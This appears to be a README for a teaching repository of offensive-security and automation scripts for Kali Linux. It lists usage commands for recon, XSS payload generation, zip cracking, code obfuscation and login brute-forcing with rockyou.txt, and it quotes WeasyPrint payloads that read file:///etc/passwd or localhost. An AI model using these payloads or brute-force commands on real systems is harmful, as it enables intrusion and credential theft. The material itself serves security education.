This repository contains a collection of Bash and Python scripts I created while teaching Kali Linux and exploring offensive security and automation.
Run the LazyScript-style dashboard to access everything in one place:
bash dashboard.shGoal: Expand ASNs into CIDRs, normalize into scan targets, and output targets.txt.
./internet-ownership/asn_expand.sh -a "AS13335,AS15169"Notes:
- Uses
whoisby default. - Optional: add
--use-bgpheand/or--use-ipinfo --ipinfo-token <TOKEN>. - If
targets.txtwould be huge, you will be asked to confirm.
/recon-massdns/recon-massdns.sh <long_domain> <keyword_to_start_with>/domain_tree/domain_tree.sh <input_file> > <output_file>/sort_domains/sort_domains.sh <input_file> <output_file>/domains_separate/separate.sh <input_file> <main_domain>./split.sh <file>
./split.sh <file1> <file2> <file3>./port_lookup/port_lookup.shgit clone https://github.com/mrhili/web-play/tree/main/polymorphic-xss
cd polymorphic-xss
python3 static_poly_gen.py
python3 poly_gen.pypython python_server/serve.pypython redirector/redirector.pypython weasy/weasy.pyThis script reads WeasyPrint-generated PDFs with payloads such as:
<link rel="attachment" href="file:///etc/passwd" />
<iframe src="http://localhost/local.txt" height="800px" width="800px"></iframe>./crackzip/crackzip.sh/backup-script-work-with-crontab/backup.sh/files-manager-script/manager/basic-bash2powershell-translator/basictranslator.sh curl ipinfo.io/52.156.12.167./ipgen/ipgen.sh 192.168.1.1-6 output.txtOutput:
192.168.1.1
192.168.1.2
...
192.168.1.6
/password-generator/generator.sh passwords.txt
/password-evaluator/evaluator.sh passwords.txtsudo /machine-id-regenaration/re.shsudo /hostname-change/change.sh/offline-mac-research/search.sh 50:46:5D:6E:8C:20/search-local-ip-from-mac/search.sh 50:46:5D:6E:8C:20/monitor/monitor.sh wlan0
/monitor/unmonitor.sh wlan0python3 /obfs_python/obfs.py example.py obfs.pypython3 /obfs_python/deobfs.py obfs.py --executepython3 /obfs_python/deobfs.py obfs.py --output=reveal.py./configure/configure.shOutput:
[+] Update and upgrade machine
[OK]
./kirct-web-profile/kirct-web-profile.sh --profile=coreThis profile is separated from configure/ on purpose and is focused on KIRCT web workflow + operator brain wrappers.
/redhcp/redhcp.sh/dios-ascii-hex/dios.shEdit these variables inside the script first:
col2_value=200
col3_value=29
col5_value=190
col7_min=3700
col7_max=380Then run:
./analyze.shpython ./py-login-bruteforce/bruteforce_v3.py --url <login_url> --cookie "session=..." --userlist <userlist.txt> --passlist <passwords.txt> --mode both --threads 10./login-bruteforce.sh -u "http://example/api/Auth/Login" -U "[email protected]" -P /usr/share/wordlists/rockyou.txtOutput:
Failed login... Success! Username: ... Password: ...
/iterate/iterate.sh template§§.com 5 7git clone https://github.com/mrhili/demo-localStorage-stealergit clone https://github.com/mrhili/HackSim
cd HackSim
python3 -m pip install -r requirements.txt
python3 main.pygit clone https://github.com/mrhili/guessthiscode.com-userscriptAdd to Tampermonkey and visit guessthiscode.com to play.
git clone https://github.com/mrhili/vgnr
cd vgnr
python3 -m pip install -e- Improve monitor script with additional modes:
mini-monitor(non-kill) andpidi-monitor(passive). - Add script to
chmod +xall scripts and install all Python dependencies automatically.
- snapshot before full upgrade
- do full upgrade
- on every upgrade do : install linux header
- sudo ./VBoxLinux